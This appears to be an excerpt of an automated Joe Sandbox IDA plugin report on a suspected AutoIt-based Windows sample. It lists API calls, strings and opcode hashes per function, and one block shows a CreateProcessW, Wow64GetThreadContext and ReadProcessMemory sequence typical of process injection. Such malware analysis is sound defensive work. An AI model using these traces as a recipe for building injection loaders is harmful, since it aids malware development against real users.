                                                                        • Opcode ID: d10ee431ad741aea453faf8c2e86644a36a79a8ceda0a56152353405ba969a0e
                                                                        • Instruction ID: ac9a89cf4c528d85fe792bb910b43fae6d9f92d09359da5a3a75259baacb909d
                                                                        • Opcode Fuzzy Hash: d10ee431ad741aea453faf8c2e86644a36a79a8ceda0a56152353405ba969a0e
                                                                        • Instruction Fuzzy Hash: CC31A4720087446FD724EB60EC46FDE77E8AF44314F10991EF58DA2192DBB0A648CB96
                                                                        APIs
                                                                          • Part of subcall function 00E741A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E739FE,?,00000001), ref: 00E741DB
                                                                        • _free.LIBCMT ref: 00EE36B7
                                                                        • _free.LIBCMT ref: 00EE36FE
                                                                          • Part of subcall function 00E7C833: __wsplitpath.LIBCMT ref: 00E7C93E
                                                                          • Part of subcall function 00E7C833: _wcscpy.LIBCMT ref: 00E7C953
                                                                          • Part of subcall function 00E7C833: _wcscat.LIBCMT ref: 00E7C968
                                                                          • Part of subcall function 00E7C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00E7C978
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                        • API String ID: 805182592-1757145024
                                                                        • Opcode ID: c22488be0ebb2732c0021478b154919707f85db1eadb2a745eb125863673b21d
                                                                        • Instruction ID: 72972d76b5bccfc7bb6141b0cc666b96c0dab7b75167dd0f804c641f5f6f50d9
                                                                        • Opcode Fuzzy Hash: c22488be0ebb2732c0021478b154919707f85db1eadb2a745eb125863673b21d
                                                                        • Instruction Fuzzy Hash: 80915C71910259AFCF04EFB5CC959EEB7B4BF09314F50942AF81ABB291DB309A05CB90
                                                                        APIs
                                                                          • Part of subcall function 00E75374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F31148,?,00E761FF,?,00000000,00000001,00000000), ref: 00E75392
                                                                          • Part of subcall function 00E749FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E74A1D
                                                                        • _wcscat.LIBCMT ref: 00EE2D80
                                                                        • _wcscat.LIBCMT ref: 00EE2DB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                        • String ID: \$\Include\
                                                                        • API String ID: 3592542968-2640467822
                                                                        • Opcode ID: 0026d5e09f70033398a6ddd4f4ecffb9d05a4568423c66475e76b29c17cb43aa
                                                                        • Instruction ID: 0de7a0b808893d195f4d05aca166614b715ed9e2b6f9c8ddf4db4c01d48aafab
                                                                        • Opcode Fuzzy Hash: 0026d5e09f70033398a6ddd4f4ecffb9d05a4568423c66475e76b29c17cb43aa
                                                                        • Instruction Fuzzy Hash: 5851D6714043489FC744FF55EE8189AB3F9FF59320B80992EF748A3261EB709908EB52
                                                                        APIs
                                                                        • __getstream.LIBCMT ref: 00E934FE
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E93539
                                                                        • __wopenfile.LIBCMT ref: 00E93549
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                        • String ID: <G
                                                                        • API String ID: 1820251861-2138716496
                                                                        • Opcode ID: 01a64062827332ed476760429fa5f17c2998e38860f0339033573f9bbe9ff98e
                                                                        • Instruction ID: 5aa8b0432a5d2cb0dcf3d73b052f1cb0bde8c122868a8080929cd448cad8eeba
                                                                        • Opcode Fuzzy Hash: 01a64062827332ed476760429fa5f17c2998e38860f0339033573f9bbe9ff98e
                                                                        • Instruction Fuzzy Hash: E9110A70A003069BDF21BF709C426AF76E4AF49754B169425E825F7281EB34CA0197A1
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E8D28B,SwapMouseButtons,00000004,?), ref: 00E8D2BC
                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E8D28B,SwapMouseButtons,00000004,?,?,?,?,00E8C865), ref: 00E8D2DD
                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00E8D28B,SwapMouseButtons,00000004,?,?,?,?,00E8C865), ref: 00E8D2FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 88f850f9bd26b8e7c0daa535ececd558dc5c5488a7bacc0a98d1c05acb49add2
                                                                        • Instruction ID: e7b9c5e0cc16052cbedaa28ce38999a0dbc58d626aab6572446c754678078997
                                                                        • Opcode Fuzzy Hash: 88f850f9bd26b8e7c0daa535ececd558dc5c5488a7bacc0a98d1c05acb49add2
                                                                        • Instruction Fuzzy Hash: BD115775619208FFDB20AFA5CC84EAE7BB8EF44744B005469B809E7160E631AE449B60
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 017CDE5B
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CDEF1
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CDF13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                        • Instruction ID: ac36c833371baad6d8f90b5476d6b69856d93ac254187321aa639300c291251b
                                                                        • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                        • Instruction Fuzzy Hash: BC621A30A14658DBEB24CFA4C854BDEB772EF58700F1091ADD20DEB290EB759E81CB59
                                                                        APIs
                                                                          • Part of subcall function 00E74517: _fseek.LIBCMT ref: 00E7452F
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC65D
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC670
                                                                        • _free.LIBCMT ref: 00EBC4DD
                                                                        • _free.LIBCMT ref: 00EBC4E4
                                                                        • _free.LIBCMT ref: 00EBC54F
                                                                          • Part of subcall function 00E91C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E97A85), ref: 00E91CB1
                                                                          • Part of subcall function 00E91C9D: GetLastError.KERNEL32(00000000,?,00E97A85), ref: 00E91CC3
                                                                        • _free.LIBCMT ref: 00EBC557
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                        • String ID:
                                                                        • API String ID: 1552873950-0
                                                                        • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                        • Instruction ID: 6acec3faa6abf18ea221d73ac4e84c316c50266f4ae346f6f8308a186a2aee38
                                                                        • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                        • Instruction Fuzzy Hash: 64514FB1904219AFDF149F64DC81BEEBBB9EF48304F1050AEB25DB3241DB715A808F58
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EE3725
                                                                        • GetOpenFileNameW.COMDLG32 ref: 00EE376F
                                                                          • Part of subcall function 00E7660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E753B1,?,?,00E761FF,?,00000000,00000001,00000000), ref: 00E7662F
                                                                          • Part of subcall function 00E740A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E740C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: d612a80dc64df70f324a029ac8b9fee7a1e613f7e2acd21f8f37b28e5f936f97
                                                                        • Instruction ID: 505bc988809bd5d95445bbdd65cf28026488943aa7799afa7632e5495c2dddae
                                                                        • Opcode Fuzzy Hash: d612a80dc64df70f324a029ac8b9fee7a1e613f7e2acd21f8f37b28e5f936f97
                                                                        • Instruction Fuzzy Hash: 9D21A8B1A10198AFCF01DFD4D8457EE7BF99F49304F009059E509F7281DBB45A898F65
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00EBC72F
                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EBC746
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$FileNamePath
                                                                        • String ID: aut
                                                                        • API String ID: 3285503233-3010740371
                                                                        • Opcode ID: 8cd4bc4feaedaf30269e0a4db340906c411fa8199f3c096a00251d3c6d80f597
                                                                        • Instruction ID: a9d4bbb2a6627214f1662a78365e5527000d6e3200cc3be22a231b77daa55506
                                                                        • Opcode Fuzzy Hash: 8cd4bc4feaedaf30269e0a4db340906c411fa8199f3c096a00251d3c6d80f597
                                                                        • Instruction Fuzzy Hash: 46D05E7160030EAFEB10AB90EC0EF9A7B6D9700704F0001A07690F50B1DAB5E699CB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3452655584d7161eaba99351c20c1672cf731a9c48c1fdcee9914b8e42e8f69
                                                                        • Instruction ID: c025b40c00c9af8150a9b6acc2f3363939ebaed78cc91f80e90e622011a5929a
                                                                        • Opcode Fuzzy Hash: f3452655584d7161eaba99351c20c1672cf731a9c48c1fdcee9914b8e42e8f69
                                                                        • Instruction Fuzzy Hash: 2EF15C716083019FC710DF24C981B6ABBE5FF88314F14996EF999AB351D731E946CB82
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E75022
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E750CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell__memset
                                                                        • String ID:
                                                                        • API String ID: 928536360-0
                                                                        • Opcode ID: 95a7a8f35dc39558c893b5371898cefc1d32876d216c0317aa900fe7bc328303
                                                                        • Instruction ID: dce02486bfe1def6a4b8eb3a73329359cf1dafe80da65b16511c48ab3e0517d3
                                                                        • Opcode Fuzzy Hash: 95a7a8f35dc39558c893b5371898cefc1d32876d216c0317aa900fe7bc328303
                                                                        • Instruction Fuzzy Hash: 7D318DB1504B05CFD721EF24D8456DBBBE8FF49318F00492EE59EA7241E7B1A948CB92
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 00E93973
                                                                          • Part of subcall function 00E981C2: __NMSG_WRITE.LIBCMT ref: 00E981E9
                                                                          • Part of subcall function 00E981C2: __NMSG_WRITE.LIBCMT ref: 00E981F3
                                                                        • __NMSG_WRITE.LIBCMT ref: 00E9397A
                                                                          • Part of subcall function 00E9821F: GetModuleFileNameW.KERNEL32(00000000,00F30312,00000104,00000000,00000001,00000000), ref: 00E982B1
                                                                          • Part of subcall function 00E9821F: ___crtMessageBoxW.LIBCMT ref: 00E9835F
                                                                          • Part of subcall function 00E91145: ___crtCorExitProcess.LIBCMT ref: 00E9114B
                                                                          • Part of subcall function 00E91145: ExitProcess.KERNEL32 ref: 00E91154
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00E8F507,?,0000000E), ref: 00E9399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: 168ba960e23689cb15e71ca335e1ca2e96c38006e95c9c97a5d3c91e84a9937b
                                                                        • Instruction ID: 7294a817ed45e4859d0acd1d313a16b6e594f4a6eae9beadc98eb90dc9327512
                                                                        • Opcode Fuzzy Hash: 168ba960e23689cb15e71ca335e1ca2e96c38006e95c9c97a5d3c91e84a9937b
                                                                        • Instruction Fuzzy Hash: C401B5323463119AEE223B35DC52B6A73C99BC5B68F212066F515FB296DFB0DD0086A0
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EBC385,?,?,?,?,?,00000004), ref: 00EBC6F2
                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EBC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EBC708
                                                                        • CloseHandle.KERNEL32(00000000,?,00EBC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EBC70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: 92ef7db9818fea3c004e3e29556c2b8f5461de4c53e87a4bead1bbf4bde255cc
                                                                        • Instruction ID: 714cedbc66045cea830795c6b297bc196d47d837f135c328c71ae934be0244fd
                                                                        • Opcode Fuzzy Hash: 92ef7db9818fea3c004e3e29556c2b8f5461de4c53e87a4bead1bbf4bde255cc
                                                                        • Instruction Fuzzy Hash: 63E08632145224BBD7211B55AC0DFDE7F19AB45764F104110FB14790E097B12525C798
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00EBBB72
                                                                          • Part of subcall function 00E91C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E97A85), ref: 00E91CB1
                                                                          • Part of subcall function 00E91C9D: GetLastError.KERNEL32(00000000,?,00E97A85), ref: 00E91CC3
                                                                        • _free.LIBCMT ref: 00EBBB83
                                                                        • _free.LIBCMT ref: 00EBBB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                        • Instruction ID: 0ae8db30abcaa89c1ea8021a1beef3ef12d2cff1f834db6460b43a5bbfa7c7fd
                                                                        • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                        • Instruction Fuzzy Hash: 6FE05EB174174287DE38A679AE88EF7A3CC4F04365B14285EB569F7186CF64FC4089B8
                                                                        APIs
                                                                          • Part of subcall function 00E722A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E724F1), ref: 00E72303
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E725A1
                                                                        • CoInitialize.OLE32(00000000), ref: 00E72618
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EE503A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 3815369404-0
                                                                        • Opcode ID: 1b2e49ea91ff89fdbe107db2ee00533bc04ec75200a1da085466ba0991d0918f
                                                                        • Instruction ID: ac7b0666f9f9bd663f5fc136187ae4bf300e12e69c89d6b5dae7ad81c5417e37
                                                                        • Opcode Fuzzy Hash: 1b2e49ea91ff89fdbe107db2ee00533bc04ec75200a1da085466ba0991d0918f
                                                                        • Instruction Fuzzy Hash: 4C71AEB490128D8FC344EF6AED9049ABBE6FB99364784922ED509D7772CB708404FF24
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 00E73A73
                                                                          • Part of subcall function 00E91405: __lock.LIBCMT ref: 00E9140B
                                                                          • Part of subcall function 00E73ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E73AF3
                                                                          • Part of subcall function 00E73ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E73B08
                                                                          • Part of subcall function 00E73D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00E73AA3,?), ref: 00E73D45
                                                                          • Part of subcall function 00E73D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00E73AA3,?), ref: 00E73D57
                                                                          • Part of subcall function 00E73D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F31148,00F31130,?,?,?,?,00E73AA3,?), ref: 00E73DC8
                                                                          • Part of subcall function 00E73D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00E73AA3,?), ref: 00E73E48
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E73AB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                        • String ID:
                                                                        • API String ID: 924797094-0
                                                                        • Opcode ID: e38ae357f7ba6323f9e796d598fef1b616416afb1260d7da1e02e34f0453c093
                                                                        • Instruction ID: 7393b4b17895fba7da7dc70cb09115d349308beb687f594c06e1f3e4fada5a5c
                                                                        • Opcode Fuzzy Hash: e38ae357f7ba6323f9e796d598fef1b616416afb1260d7da1e02e34f0453c093
                                                                        • Instruction Fuzzy Hash: B811C0B19083459FC314EF25EC4591AFBEAFBD4360F00891FF989A72A1DB709544DB92
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 00E9EA29
                                                                        • __close_nolock.LIBCMT ref: 00E9EA42
                                                                          • Part of subcall function 00E97BDA: __getptd_noexit.LIBCMT ref: 00E97BDA
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
